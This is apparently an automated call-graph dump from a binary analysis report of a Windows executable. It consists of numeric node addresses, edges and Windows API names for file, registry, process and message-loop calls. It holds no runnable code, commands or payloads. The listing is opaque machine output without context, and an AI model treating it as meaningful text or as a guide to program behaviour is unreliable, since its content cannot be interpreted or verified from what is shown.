3c7063 96224->96225 96228 354c6d 22 API calls 96224->96228 96230 357510 53 API calls 96225->96230 96236 3c7069 96225->96236 96229 3c7145 96226->96229 96227->96206 96228->96225 96508 35525f 96229->96508 96232 3c70a0 96230->96232 96661 3bd076 57 API calls 96232->96661 96233 3c7166 96235 354c6d 22 API calls 96233->96235 96237 3c7175 96235->96237 96236->96203 96238 3c71a9 96237->96238 96239 354c6d 22 API calls 96237->96239 96240 35a8c7 22 API calls 96238->96240 96242 3c7186 96239->96242 96241 3c71ba 96240->96241 96243 356350 22 API calls 96241->96243 96242->96238 96245 356b57 22 API calls 96242->96245 96244 3c71c8 96243->96244 96246 356350 22 API calls 96244->96246 96247 3c719b 96245->96247 96248 3c71d6 96246->96248 96249 356b57 22 API calls 96247->96249 96250 356350 22 API calls 96248->96250 96249->96238 96251 3c71e4 96250->96251 96252 357510 53 API calls 96251->96252 96253 3c71f0 96252->96253 96550 3bd7bc 96253->96550 96255 3c7201 96256 3bd4ce 4 API calls 96255->96256 96257 3c720b 96256->96257 96258 357510 53 API calls 96257->96258 96261 3c7239 96257->96261 96259 3c7229 96258->96259 96604 3c2947 96259->96604 96262 354f39 68 API calls 96261->96262 96262->96203 96263->96096 96264->96058 96265->96066 96266->96071 96267->96083 96268->96083 96269->96060 96270->96097 96271->96097 96272->96097 96273->96092 96274->96097 96275->96120 96276->96123 96277->96121 96278->96117 96280 357525 96279->96280 96297 357522 96279->96297 96281 35752d 96280->96281 96282 35755b 96280->96282 96331 3751c6 26 API calls 96281->96331 96285 35756d 96282->96285 96289 39500f 96282->96289 96292 3950f6 96282->96292 96332 36fb21 51 API calls 96285->96332 96286 35753d 96291 36fddb 22 API calls 96286->96291 96287 39510e 96287->96287 96295 395088 96289->96295 96296 36fe0b 22 API calls 96289->96296 96293 357547 96291->96293 96334 375183 26 API calls 96292->96334 96294 359cb3 22 API calls 96293->96294 96294->96297 96333 36fb21 51 API calls 96295->96333 96298 395058 96296->96298 96302 359e90 96297->96302 96299 36fddb 22 API calls 96298->96299 96300 39507f 96299->96300 96301 359cb3 22 API calls 96300->96301 96301->96295 96303 356270 22 API calls 96302->96303 96323 359eb5 96303->96323 96304 359fd2 96336 35a4a1 22 API calls __fread_nolock 96304->96336 96306 359fec 96306->96129 96309 35a6c3 22 API calls 96309->96323 96310 35a12c __fread_nolock 96311 39f7c4 96310->96311 96315 35a405 96310->96315 96341 3b96e2 84 API calls __wsopen_s 96311->96341 96312 39f699 96318 36fddb 22 API calls 96312->96318 96314 35a4a1 22 API calls 96314->96323 96315->96306 96343 3b96e2 84 API calls __wsopen_s 96315->96343 96320 39f754 96318->96320 96319 39f7d2 96342 35a4a1 22 API calls __fread_nolock 96319->96342 96324 36fe0b 22 API calls 96320->96324 96322 39f7e8 96322->96306 96323->96304 96323->96309 96323->96310 96323->96311 96323->96312 96323->96314 96323->96315 96326 35a587 22 API calls 96323->96326 96327 35aec9 22 API calls 96323->96327 96335 354573 41 API calls _wcslen 96323->96335 96338 3548c8 23 API calls 96323->96338 96339 3549bd 22 API calls __fread_nolock 96323->96339 96340 35a673 22 API calls 96323->96340 96324->96310 96326->96323 96328 35a0db CharUpperBuffW 96327->96328 96337 35a673 22 API calls 96328->96337 96330->96133 96331->96286 96332->96286 96333->96292 96334->96287 96335->96323 96336->96306 96337->96323 96338->96323 96339->96323 96340->96323 96341->96319 96342->96322 96343->96306 96345 3bdbdc GetFileAttributesW 96344->96345 96346 3bd4d5 96344->96346 96345->96346 96347 3bdbe8 FindFirstFileW 96345->96347 96346->96097 96347->96346 96348 3bdbf9 FindClose 96347->96348 96348->96346 96350 357510 53 API calls 96349->96350 96351 3d7f90 96350->96351 96375 3d7fd5 ISource 96351->96375 96387 3d8cd3 96351->96387 96353 3d8281 96354 3d844f 96353->96354 96359 3d828f 96353->96359 96428 3d8ee4 60 API calls 96354->96428 96357 3d845e 96358 3d846a 96357->96358 96357->96359 96358->96375 96400 3d7e86 96359->96400 96360 357510 53 API calls 96377 3d8049 96360->96377 96365 3d82c8 96415 36fc70 96365->96415 96368 3d82e8 96421 3c359c 82 API calls __wsopen_s 96368->96421 96369 3d8302 96422 3563eb 22 API calls 96369->96422 96372 3d82f3 GetCurrentProcess TerminateProcess 96372->96369 96373 3d8311 96423 356a50 22 API calls 96373->96423 96375->96139 96376 3d832a 96385 3d8352 96376->96385 96424 3604f0 22 API calls 96376->96424 96377->96353 96377->96360 96377->96375 96419 3b417d 22 API calls __fread_nolock 96377->96419 96420 3d851d 42 API calls _strftime 96377->96420 96378 3d84c5 96378->96375 96382 3d84d9 FreeLibrary 96378->96382 96380 3d8341 96425 3d8b7b 75 API calls 96380->96425 96382->96375 96385->96378 96426 3604f0 22 API calls 96385->96426 96427 35aceb 23 API calls ISource 96385->96427 96429 3d8b7b 75 API calls 96385->96429 96388 35aec9 22 API calls 96387->96388 96389 3d8cee CharLowerBuffW 96388->96389 96430 3b8e54 96389->96430 96393 35a961 22 API calls 96394 3d8d2a 96393->96394 96437 356d25 96394->96437 96396 3d8d3e 96397 3593b2 22 API calls 96396->96397 96399 3d8d48 _wcslen 96397->96399 96398 3d8e5e _wcslen 96398->96377 96399->96398 96450 3d851d 42 API calls _strftime 96399->96450 96401 3d7ea1 96400->96401 96405 3d7eec 96400->96405 96402 36fe0b 22 API calls 96401->96402 96403 3d7ec3 96402->96403 96404 36fddb 22 API calls 96403->96404 96403->96405 96404->96403 96406 3d9096 96405->96406 96407 3d92ab ISource 96406->96407 96414 3d90ba _strcat _wcslen 96406->96414 96407->96365 96408 35b567 39 API calls 96408->96414 96409 35b38f 39 API calls 96409->96414 96410 35b6b5 39 API calls 96410->96414 96411 357510 53 API calls 96411->96414 96412 37ea0c 21 API calls ___std_exception_copy 96412->96414 96414->96407 96414->96408 96414->96409 96414->96410 96414->96411 96414->96412 96454 3befae 24 API calls _wcslen 96414->96454 96417 36fc85 96415->96417 96416 36fd1d ReadFile 96418 36fceb 96416->96418 96417->96416 96417->96418 96418->96368 96418->96369 96419->96377 96420->96377 96421->96372 96422->96373 96423->96376 96424->96380 96425->96385 96426->96385 96427->96385 96428->96357 96429->96385 96431 3b8e74 _wcslen 96430->96431 96432 3b8f63 96431->96432 96435 3b8ea9 96431->96435 96436 3b8f68 96431->96436 96432->96393 96432->96399 96435->96432 96451 36ce60 41 API calls 96435->96451 96436->96432 96452 36ce60 41 API calls 96436->96452 96438 356d34 96437->96438 96439 356d91 96437->96439 96438->96439 96441 356d3f 96438->96441 96440 3593b2 22 API calls 96439->96440 96446 356d62 __fread_nolock 96440->96446 96442 394c9d 96441->96442 96443 356d5a 96441->96443 96445 36fddb 22 API calls 96442->96445 96453 356f34 22 API calls 96443->96453 96447 394ca7 96445->96447 96446->96396 96448 36fe0b 22 API calls 96447->96448 96449 394cda 96448->96449 96450->96398 96451->96435 96452->96436 96453->96446 96454->96414 96456 3c1e9f 96455->96456 96457 3c1ea4 96455->96457 96504 3c0f67 24 API calls __fread_nolock 96456->96504 96457->96145 96460 36fe0b 22 API calls 96459->96460 96461 36f1ef 96460->96461 96462 36fddb 22 API calls 96461->96462 96463 36f1fb 96462->96463 96464 36f733 96463->96464 96465 36f741 96464->96465 96466 36f77f 96464->96466 96465->96466 96469 36f74c 96465->96469 96506 3bca5b 22 API calls __fread_nolock 96466->96506 96468 36f762 __fread_nolock 96468->96164 96470 3af2fe 96469->96470 96471 36f75a 96469->96471 96472 36fddb 22 API calls 96470->96472 96505 36f788 22 API calls 96471->96505 96474 3af308 96472->96474 96475 36fe0b 22 API calls 96474->96475 96476 3af32d 96475->96476 96478 356dc7 96477->96478 96479 356e0b 96477->96479 96480 36fe0b 22 API calls 96478->96480 96481 35a6c3 22 API calls 96479->96481 96482 356ddc MultiByteToWideChar 96480->96482 96484 356dff 96481->96484 96483 356e90 22 API calls 96482->96483 96483->96484 96484->96179 96485->96156 96486->96150 96487->96156 96489 356f24 96488->96489 96490 356ea3 96488->96490 96491 3593b2 22 API calls 96489->96491 96490->96489 96493 356eaf 96490->96493 96492 356ec1 __fread_nolock 96491->96492 96492->96171 96494 356ee7 96493->96494 96495 356eb9 96493->96495 96496 36fddb 22 API calls 96494->96496 96507 356f34 22 API calls 96495->96507 96498 356ef1 96496->96498 96499 36fe0b 22 API calls 96498->96499 96499->96492 96500->96156 96501->96156 96502->96179 96503->96156 96504->96457 96505->96468 96506->96468 96507->96492 96509 35a961 22 API calls 96508->96509 96510 355275 96509->96510 96511 35a961 22 API calls 96510->96511 96512 35527d 96511->96512 96513 35a961 22 API calls 96512->96513 96514 355285 96513->96514 96515 35a961 22 API calls 96514->96515 96516 35528d 96515->96516 96517 3552c1 96516->96517 96518 393df5 96516->96518 96520 356d25 22 API calls 96517->96520 96519 35a8c7 22 API calls 96518->96519 96521 393dfe 96519->96521 96522 3552cf 96520->96522 96523 35a6c3 22 API calls 96521->96523 96524 3593b2 22 API calls 96522->96524 96525 355304 96523->96525 96526 3552d9 96524->96526 96530 355325 96525->96530 96542 355349 96525->96542 96545 393e20 96525->96545 96526->96525 96527 356d25 22 API calls 96526->96527 96529 3552fa 96527->96529 96528 356d25 22 API calls 96531 35535a 96528->96531 96532 3593b2 22 API calls 96529->96532 96533 354c6d 22 API calls 96530->96533 96530->96542 96534 355370 96531->96534 96539 35a8c7 22 API calls 96531->96539 96532->96525 96536 355332 96533->96536 96535 355384 96534->96535 96540 35a8c7 22 API calls 96534->96540 96538 35538f 96535->96538 96543 35a8c7 22 API calls 96535->96543 96541 356d25 22 API calls 96536->96541 96536->96542 96537 356b57 22 API calls 96547 393ee0 96537->96547 96544 35a8c7 22 API calls 96538->96544 96549 35539a 96538->96549 96539->96534 96540->96535 96541->96542 96542->96528 96543->96538 96544->96549 96545->96537 96546 354c6d 22 API calls 96546->96547 96547->96542 96547->96546 96662 3549bd 22 API calls __fread_nolock 96547->96662 96549->96233 96551 3bd7d8 96550->96551 96552 3bd7dd 96551->96552 96553 3bd7f3 96551->96553 96556 35a8c7 22 API calls 96552->96556 96603 3bd7ee 96552->96603 96554 35a961 22 API calls 96553->96554 96555 3bd7fb 96554->96555 96557 35a961 22 API calls 96555->96557 96556->96603 96558 3bd803 96557->96558 96559 35a961 22 API calls 96558->96559 96560 3bd80e 96559->96560 96561 35a961 22 API calls 96560->96561 96562 3bd816 96561->96562 96563 35a961 22 API calls 96562->96563 96564 3bd81e 96563->96564 96565 35a961 22 API calls 96564->96565 96566 3bd826 96565->96566 96567 35a961 22 API calls 96566->96567 96568 3bd82e 96567->96568 96569 35a961 22 API calls 96568->96569 96570 3bd836 96569->96570 96571 35525f 22 API calls 96570->96571 96572 3bd84d 96571->96572 96573 35525f 22 API calls 96572->96573 96574 3bd866 96573->96574 96575 354c6d 22 API calls 96574->96575 96576 3bd872 96575->96576 96577 3bd885 96576->96577 96578 3593b2 22 API calls 96576->96578 96579 354c6d 22 API calls 96577->96579 96578->96577 96580 3bd88e 96579->96580 96581 3bd89e 96580->96581 96583 3593b2 22 API calls 96580->96583 96582 3bd8b0 96581->96582 96584 35a8c7 22 API calls 96581->96584 96585 356350 22 API calls 96582->96585 96583->96581 96584->96582 96586 3bd8bb 96585->96586 96663 3bd978 22 API calls 96586->96663 96588 3bd8ca 96664 3bd978 22 API calls 96588->96664 96590 3bd8dd 96591 354c6d 22 API calls 96590->96591 96592 3bd8e7 96591->96592 96593 3bd8fe 96592->96593 96594 3bd8ec 96592->96594 96596 354c6d 22 API calls 96593->96596 96595 3533c6 22 API calls 96594->96595 96598 3bd8f9 96595->96598 96597 3bd907 96596->96597 96599 3bd925 96597->96599 96600 3533c6 22 API calls 96597->96600 96601 356350 22 API calls 96598->96601 96602 356350 22 API calls 96599->96602 96600->96598 96601->96599 96602->96603 96603->96255 96605 3c2954 __wsopen_s 96604->96605 96606 36fe0b 22 API calls 96605->96606 96607 3c2971 96606->96607 96608 355722 22 API calls 96607->96608 96609 3c297b 96608->96609 96610 3c274e 27 API calls 96609->96610 96611 3c2986 96610->96611 96612 35511f 64 API calls 96611->96612 96613 3c299b 96612->96613 96614 3c2a6c 96613->96614 96615 3c29bf 96613->96615 96616 3c2e66 75 API calls 96614->96616 96617 3c2e66 75 API calls 96615->96617 96632 3c2a38 96616->96632 96618 3c29c4 96617->96618 96625 3c2a75 ISource 96618->96625 96669 37d583 26 API calls 96618->96669 96620 3550f5 40 API calls 96621 3c2a91 96620->96621 96622 3550f5 40 API calls 96621->96622 96624 3c2aa1 96622->96624 96623 3c29ed 96670 37d583 26 API calls 96623->96670 96626 3550f5 40 API calls 96624->96626 96625->96261 96628 3c2abc 96626->96628 96629 3550f5 40 API calls 96628->96629 96630 3c2acc 96629->96630 96631 3550f5 40 API calls 96630->96631 96633 3c2ae7 96631->96633 96632->96620 96632->96625 96634 3550f5 40 API calls 96633->96634 96635 3c2af7 96634->96635 96636 3550f5 40 API calls 96635->96636 96637 3c2b07 96636->96637 96638 3550f5 40 API calls 96637->96638 96639 3c2b17 96638->96639 96665 3c3017 GetTempPathW GetTempFileNameW 96639->96665 96641 3c2b22 96642 37e5eb 29 API calls 96641->96642 96652 3c2b33 96642->96652 96643 3c2bed 96644 37e678 67 API calls 96643->96644 96645 3c2bf8 96644->96645 96647 3c2bfe DeleteFileW 96645->96647 96648 3c2c12 96645->96648 96646 3550f5 40 API calls 96646->96652 96647->96625 96649 3c2c91 CopyFileW 96648->96649 96655 3c2c18 96648->96655 96650 3c2cb9 DeleteFileW 96649->96650 96651 3c2ca7 DeleteFileW 96649->96651 96666 3c2fd8 CreateFileW 96650->96666 96651->96625 96652->96625 96652->96643 96652->96646 96654 37dbb3 65 API calls 96652->96654 96654->96652 96656 3c22ce 79 API calls 96655->96656 96657 3c2c7c 96656->96657 96657->96650 96658 3c2c80 DeleteFileW 96657->96658 96658->96625 96659->96188 96660->96224 96661->96236 96662->96547 96663->96588 96664->96590 96665->96641 96667 3c2fff SetFileTime CloseHandle 96666->96667 96668 3c3013 96666->96668 96667->96668 96668->96625 96669->96623 96670->96632 96671 3703fb 96672 370407 BuildCatchObjectHelperInternal 96671->96672 96700 36feb1 96672->96700 96674 37040e 96675 370561 96674->96675 96680 370438 96674->96680 96727 37083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96675->96727 96677 370568 96728 374e52 28 API calls _abort 96677->96728 96679 37056e 96729 374e04 28 API calls _abort 96679->96729 96688 370477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96680->96688 96711 38247d 96680->96711 96684 370576 96685 370457 96687 3704d8 96719 370959 96687->96719 96688->96687 96723 374e1a 38 API calls 3 library calls 96688->96723 96691 3704de 96692 3704f3 96691->96692 96724 370992 GetModuleHandleW 96692->96724 96694 3704fa 96694->96677 96695 3704fe 96694->96695 96696 370507 96695->96696 96725 374df5 28 API calls _abort 96695->96725 96726 370040 13 API calls 2 library calls 96696->96726 96699 37050f 96699->96685 96701 36feba 96700->96701 96730 370698 IsProcessorFeaturePresent 96701->96730 96703 36fec6 96731 372c94 10 API calls 3 library calls 96703->96731 96705 36fecb 96706 36fecf 96705->96706 96732 382317 96705->96732 96706->96674 96709 36fee6 96709->96674 96712 382494 96711->96712 96713 370a8c _ValidateLocalCookies 5 API calls 96712->96713 96714 370451 96713->96714 96714->96685 96715 382421 96714->96715 96717 382450 96715->96717 96716 370a8c _ValidateLocalCookies 5 API calls 96718 382479 96716->96718 96717->96716 96718->96688 96783 372340 96719->96783 96722 37097f 96722->96691 96723->96687 96724->96694 96725->96696 96726->96699 96727->96677 96728->96679 96729->96684 96730->96703 96731->96705 96736 38d1f6 96732->96736 96735 372cbd 8 API calls 3 library calls 96735->96706 96739 38d213 96736->96739 96740 38d20f 96736->96740 96737 370a8c _ValidateLocalCookies 5 API calls 96738 36fed8 96737->96738 96738->96709 96738->96735 96739->96740 96742 384bfb 96739->96742 96740->96737 96743 384c07 BuildCatchObjectHelperInternal 96742->96743 96754 382f5e EnterCriticalSection 96743->96754 96745 384c0e 96755 3850af 96745->96755 96747 384c1d 96748 384c2c 96747->96748 96768 384a8f 29 API calls 96747->96768 96770 384c48 LeaveCriticalSection _abort 96748->96770 96751 384c27 96769 384b45 GetStdHandle GetFileType 96751->96769 96752 384c3d __fread_nolock 96752->96739 96754->96745 96756 3850bb BuildCatchObjectHelperInternal 96755->96756 96757 3850c8 96756->96757 96758 3850df 96756->96758 96779 37f2d9 20 API calls _abort 96757->96779 96771 382f5e EnterCriticalSection 96758->96771 96761 3850cd 96780 3827ec 26 API calls pre_c_initialization 96761->96780 96763 385117 96781 38513e LeaveCriticalSection _abort 96763->96781 96764 3850d7 __fread_nolock 96764->96747 96765 3850eb 96765->96763 96772 385000 96765->96772 96768->96751 96769->96748 96770->96752 96771->96765 96773 384c7d _unexpected 20 API calls 96772->96773 96774 385012 96773->96774 96778 38501f 96774->96778 96782 383405 11 API calls 2 library calls 96774->96782 96775 3829c8 _free 20 API calls 96777 385071 96775->96777 96777->96765 96778->96775 96779->96761 96780->96764 96781->96764 96782->96774 96784 37096c GetStartupInfoW 96783->96784 96784->96722 96785 351098 96790 3542de 96785->96790 96789 3510a7 96791 35a961 22 API calls 96790->96791 96792 3542f5 GetVersionExW 96791->96792 96793 356b57 22 API calls 96792->96793 96794 354342 96793->96794 96795 3593b2 22 API calls 96794->96795 96800 354378 96794->96800 96796 35436c 96795->96796 96798 3537a0 22 API calls 96796->96798 96797 35441b GetCurrentProcess IsWow64Process 96799 354437 96797->96799 96798->96800 96801 35444f LoadLibraryA 96799->96801 96802 393824 GetSystemInfo 96799->96802 96800->96797 96805 3937df 96800->96805 96803 354460 GetProcAddress 96801->96803 96804 35449c GetSystemInfo 96801->96804 96803->96804 96806 354470 GetNativeSystemInfo 96803->96806 96807 354476 96804->96807 96806->96807 96808 35109d 96807->96808 96809 35447a FreeLibrary 96807->96809 96810 3700a3 29 API calls __onexit 96808->96810 96809->96808 96810->96789 96811 35105b 96816 35344d 96811->96816 96813 35106a 96847 3700a3 29 API calls __onexit 96813->96847 96815 351074 96817 35345d __wsopen_s 96816->96817 96818 35a961 22 API calls 96817->96818 96819 353513 96818->96819 96820 353a5a 24 API calls 96819->96820 96821 35351c 96820->96821 96848 353357 96821->96848 96824 3533c6 22 API calls 96825 353535 96824->96825 96826 35515f 22 API calls 96825->96826 96827 353544 96826->96827 96828 35a961 22 API calls 96827->96828 96829 35354d 96828->96829 96830 35a6c3 22 API calls 96829->96830 96831 353556 RegOpenKeyExW 96830->96831 96832 393176 RegQueryValueExW 96831->96832 96836 353578 96831->96836 96833 39320c RegCloseKey 96832->96833 96834 393193 96832->96834 96833->96836 96840 39321e _wcslen 96833->96840 96835 36fe0b 22 API calls 96834->96835 96837 3931ac 96835->96837 96836->96813 96839 355722 22 API calls 96837->96839 96838 354c6d 22 API calls 96838->96840 96841 3931b7 RegQueryValueExW 96839->96841 96840->96836 96840->96838 96845 359cb3 22 API calls 96840->96845 96846 35515f 22 API calls 96840->96846 96842 3931d4 96841->96842 96844 3931ee ISource 96841->96844 96843 356b57 22 API calls 96842->96843 96843->96844 96844->96833 96845->96840 96846->96840 96847->96815 96849 391f50 __wsopen_s 96848->96849 96850 353364 GetFullPathNameW 96849->96850 96851 353386 96850->96851 96852 356b57 22 API calls 96851->96852 96853 3533a4 96852->96853 96853->96824 96854 3a3f75 96865 36ceb1 96854->96865 96856 3a3f8b 96864 3a4006 96856->96864 96932 36e300 23 API calls 96856->96932 96859 3a4052 96862 3a4a88 96859->96862 96934 3c359c 82 API calls __wsopen_s 96859->96934 96861 3a3fe6 96861->96859 96933 3c1abf 22 API calls 96861->96933 96874 35bf40 96864->96874 96866 36ced2 96865->96866 96867 36cebf 96865->96867 96869 36ced7 96866->96869 96870 36cf05 96866->96870 96935 35aceb 23 API calls ISource 96867->96935 96871 36fddb 22 API calls 96869->96871 96936 35aceb 23 API calls ISource 96870->96936 96873 36cec9 96871->96873 96873->96856 96937 35adf0 96874->96937 96876 35bf9d 96877 3a04b6 96876->96877 96878 35bfa9 96876->96878 96956 3c359c 82 API calls __wsopen_s 96877->96956 96880 3a04c6 96878->96880 96881 35c01e 96878->96881 96957 3c359c 82 API calls __wsopen_s 96880->96957 96942 35ac91 96881->96942 96884 35c7da 96888 36fe0b 22 API calls 96884->96888 96893 35c808 __fread_nolock 96888->96893 96890 3a04f5 96894 3a055a 96890->96894 96958 36d217 239 API calls 96890->96958 96897 36fe0b 22 API calls 96893->96897 96918 35c603 96894->96918 96959 3c359c 82 API calls __wsopen_s 96894->96959 96895 3b7120 22 API calls 96929 35c039 ISource __fread_nolock 96895->96929 96896 3a091a 96969 3c3209 23 API calls 96896->96969 96930 35c350 ISource __fread_nolock 96897->96930 96898 35af8a 22 API calls 96898->96929 96901 35ec40 239 API calls 96901->96929 96902 3a08a5 96903 35ec40 239 API calls 96902->96903 96905 3a08cf 96903->96905 96905->96918 96967 35a81b 41 API calls 96905->96967 96906 3a0591 96960 3c359c 82 API calls __wsopen_s 96906->96960 96907 3a08f6 96968 3c359c 82 API calls __wsopen_s 96907->96968 96912 35c237 96915 35c253 96912->96915 96916 35a8c7 22 API calls 96912->96916 96913 36fddb 22 API calls 96913->96929 96919 3a0976 96915->96919 96923 35c297 ISource 96915->96923 96916->96915 96917 36fe0b 22 API calls 96917->96929 96918->96859 96970 35aceb 23 API calls ISource 96919->96970 96922 3a09bf 96922->96918 96971 3c359c 82 API calls __wsopen_s 96922->96971 96923->96922 96953 35aceb 23 API calls ISource 96923->96953 96925 35c335 96925->96922 96926 35c342 96925->96926 96954 35a704 22 API calls ISource 96926->96954 96927 35bbe0 40 API calls 96927->96929 96929->96884 96929->96890 96929->96893 96929->96894 96929->96895 96929->96896 96929->96898 96929->96901 96929->96902 96929->96906 96929->96907 96929->96912 96929->96913 96929->96917 96929->96918 96929->96922 96929->96927 96946 35ad81 96929->96946 96961 3b7099 22 API calls __fread_nolock 96929->96961 96962 3d5745 54 API calls _wcslen 96929->96962 96963 36aa42 22 API calls ISource 96929->96963 96964 3bf05c 40 API calls 96929->96964 96965 35a993 41 API calls 96929->96965 96966 35aceb 23 API calls ISource 96929->96966 96931 35c3ac 96930->96931 96955 36ce17 22 API calls ISource 96930->96955 96931->96859 96932->96861 96933->96864 96934->96862 96935->96873 96936->96873 96938 35ae01 96937->96938 96941 35ae1c ISource 96937->96941 96939 35aec9 22 API calls 96938->96939 96940 35ae09 CharUpperBuffW 96939->96940 96940->96941 96941->96876 96943 35acae 96942->96943 96944 35acd1 96943->96944 96972 3c359c 82 API calls __wsopen_s 96943->96972 96944->96929 96947 39fadb 96946->96947 96948 35ad92 96946->96948 96949 36fddb 22 API calls 96948->96949 96950 35ad99 96949->96950 96973 35adcd 96950->96973 96953->96925 96954->96930 96955->96930 96956->96880 96957->96918 96958->96894 96959->96918 96960->96918 96961->96929 96962->96929 96963->96929 96964->96929 96965->96929 96966->96929 96967->96907 96968->96918 96969->96912 96970->96922 96971->96918 96972->96944 96977 35addd 96973->96977 96974 35adb6 96974->96929 96975 36fddb 22 API calls 96975->96977 96976 35a961 22 API calls 96976->96977 96977->96974 96977->96975 96977->96976 96978 35a8c7 22 API calls 96977->96978 96979 35adcd 22 API calls 96977->96979 96978->96977 96979->96977 96980 351044 96985 3510f3 96980->96985 96982 35104a 97021 3700a3 29 API calls __onexit 96982->97021 96984 351054 97022 351398 96985->97022 96989 35116a 96990 35a961 22 API calls 96989->96990 96991 351174 96990->96991 96992 35a961 22 API calls 96991->96992 96993 35117e 96992->96993 96994 35a961 22 API calls 96993->96994 96995 351188 96994->96995 96996 35a961 22 API calls 96995->96996 96997 3511c6 96996->96997 96998 35a961 22 API calls 96997->96998 96999 351292 96998->96999 97032 35171c 96999->97032 97003 3512c4 97004 35a961 22 API calls 97003->97004 97005 3512ce 97004->97005 97006 361940 9 API calls 97005->97006 97007 3512f9 97006->97007 97053 351aab 97007->97053 97009 351315 97010 351325 GetStdHandle 97009->97010 97011 392485 97010->97011 97012 35137a 97010->97012 97011->97012 97013 39248e 97011->97013 97015 351387 OleInitialize 97012->97015 97014 36fddb 22 API calls 97013->97014 97016 392495 97014->97016 97015->96982 97060 3c011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97016->97060 97018 39249e 97061 3c0944 CreateThread 97018->97061 97020 3924aa CloseHandle 97020->97012 97021->96984 97062 3513f1 97022->97062 97025 3513f1 22 API calls 97026 3513d0 97025->97026 97027 35a961 22 API calls 97026->97027 97028 3513dc 97027->97028 97029 356b57 22 API calls 97028->97029 97030 351129 97029->97030 97031 351bc3 6 API calls 97030->97031 97031->96989 97033 35a961 22 API calls 97032->97033 97034 35172c 97033->97034 97035 35a961 22 API calls 97034->97035 97036 351734 97035->97036 97037 35a961 22 API calls 97036->97037 97038 35174f 97037->97038 97039 36fddb 22 API calls 97038->97039 97040 35129c 97039->97040 97041 351b4a 97040->97041 97042 351b58 97041->97042 97043 35a961 22 API calls 97042->97043 97044 351b63 97043->97044 97045 35a961 22 API calls 97044->97045 97046 351b6e 97045->97046 97047 35a961 22 API calls 97046->97047 97048 351b79 97047->97048 97049 35a961 22 API calls 97048->97049 97050 351b84 97049->97050 97051 36fddb 22 API calls 97050->97051 97052 351b96 RegisterWindowMessageW 97051->97052 97052->97003 97054 39272d 97053->97054 97055 351abb 97053->97055 97069 3c3209 23 API calls 97054->97069 97057 36fddb 22 API calls 97055->97057 97059 351ac3 97057->97059 97058 392738 97059->97009 97060->97018 97061->97020 97070 3c092a 28 API calls 97061->97070 97063 35a961 22 API calls 97062->97063 97064 3513fc 97063->97064 97065 35a961 22 API calls 97064->97065 97066 351404 97065->97066 97067 35a961 22 API calls 97066->97067 97068 3513c6 97067->97068 97068->97025 97069->97058 97071 352de3 97072 352df0 __wsopen_s 97071->97072 97073 392c2b ___scrt_fastfail 97072->97073 97074 352e09 97072->97074 97076 392c47 GetOpenFileNameW 97073->97076 97075 353aa2 23 API calls 97074->97075 97077 352e12 97075->97077 97078 392c96 97076->97078 97087 352da5 97077->97087 97080 356b57 22 API calls 97078->97080 97082 392cab 97080->97082 97082->97082 97084 352e27 97105 3544a8 97084->97105 97088 391f50 __wsopen_s 97087->97088 97089 352db2 GetLongPathNameW 97088->97089 97090 356b57 22 API calls 97089->97090 97091 352dda 97090->97091 97092 353598 97091->97092 97093 35a961 22 API calls 97092->97093 97094 3535aa 97093->97094 97095 353aa2 23 API calls 97094->97095 97096 3535b5 97095->97096 97097 3535c0 97096->97097 97101 3932eb 97096->97101 97098 35515f 22 API calls 97097->97098 97100 3535cc 97098->97100 97134 3535f3 97100->97134 97103 39330d 97101->97103 97140 36ce60 41 API calls 97101->97140 97104 3535df 97104->97084 97106 354ecb 94 API calls 97105->97106 97107 3544cd 97106->97107 97108 393833 97107->97108 97110 354ecb 94 API calls 97107->97110 97109 3c2cf9 80 API calls 97108->97109 97111 393848 97109->97111 97112 3544e1 97110->97112 97113 393869 97111->97113 97114 39384c 97111->97114 97112->97108 97115 3544e9 97112->97115 97117 36fe0b 22 API calls 97113->97117 97116 354f39 68 API calls 97114->97116 97118 3544f5 97115->97118 97119 393854 97115->97119 97116->97119 97127 3938ae 97117->97127 97141 35940c 136 API calls 2 library calls 97118->97141 97142 3bda5a 82 API calls 97119->97142 97122 393862 97122->97113 97123 352e31 97124 354f39 68 API calls 97128 393a5f 97124->97128 97127->97128 97131 359cb3 22 API calls 97127->97131 97143 3b967e 22 API calls __fread_nolock 97127->97143 97144 3b95ad 42 API calls _wcslen 97127->97144 97145 3c0b5a 22 API calls 97127->97145 97146 35a4a1 22 API calls __fread_nolock 97127->97146 97147 353ff7 22 API calls 97127->97147 97128->97124 97148 3b989b 82 API calls __wsopen_s 97128->97148 97131->97127 97135 353605 97134->97135 97139 353624 __fread_nolock 97134->97139 97137 36fe0b 22 API calls 97135->97137 97136 36fddb 22 API calls 97138 35363b 97136->97138 97137->97139 97138->97104 97139->97136 97140->97101 97141->97123 97142->97122 97143->97127 97144->97127 97145->97127 97146->97127 97147->97127 97148->97128 97149 351cad SystemParametersInfoW 97150 3a2a00 97154 35d7b0 ISource 97150->97154 97151 35d9d5 97152 35db11 PeekMessageW 97152->97154 97153 35d807 GetInputState 97153->97152 97153->97154 97154->97151 97154->97152 97154->97153 97155 3a1cbe TranslateAcceleratorW 97154->97155 97157 35db8f PeekMessageW 97154->97157 97158 35da04 timeGetTime 97154->97158 97159 35db73 TranslateMessage DispatchMessageW 97154->97159 97160 35dbaf Sleep 97154->97160 97161 3a2b74 Sleep 97154->97161 97164 3a1dda timeGetTime 97154->97164 97178 35ec40 239 API calls 97154->97178 97179 361310 239 API calls 97154->97179 97180 35bf40 239 API calls 97154->97180 97182 35dd50 97154->97182 97189 35dfd0 97154->97189 97212 36edf6 97154->97212 97218 3c3a2a 23 API calls 97154->97218 97219 3c359c 82 API calls __wsopen_s 97154->97219 97155->97154 97157->97154 97158->97154 97159->97157 97162 35dbc0 97160->97162 97161->97162 97162->97151 97162->97154 97163 36e551 timeGetTime 97162->97163 97167 3a2c0b GetExitCodeProcess 97162->97167 97170 3a2a31 97162->97170 97171 3e29bf GetForegroundWindow 97162->97171 97173 3a2ca9 Sleep 97162->97173 97220 3d5658 23 API calls 97162->97220 97221 3be97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97162->97221 97222 3bd4dc 47 API calls 97162->97222 97163->97162 97217 36e300 23 API calls 97164->97217 97168 3a2c21 WaitForSingleObject 97167->97168 97169 3a2c37 CloseHandle 97167->97169 97168->97154 97168->97169 97169->97162 97170->97151 97171->97162 97173->97154 97178->97154 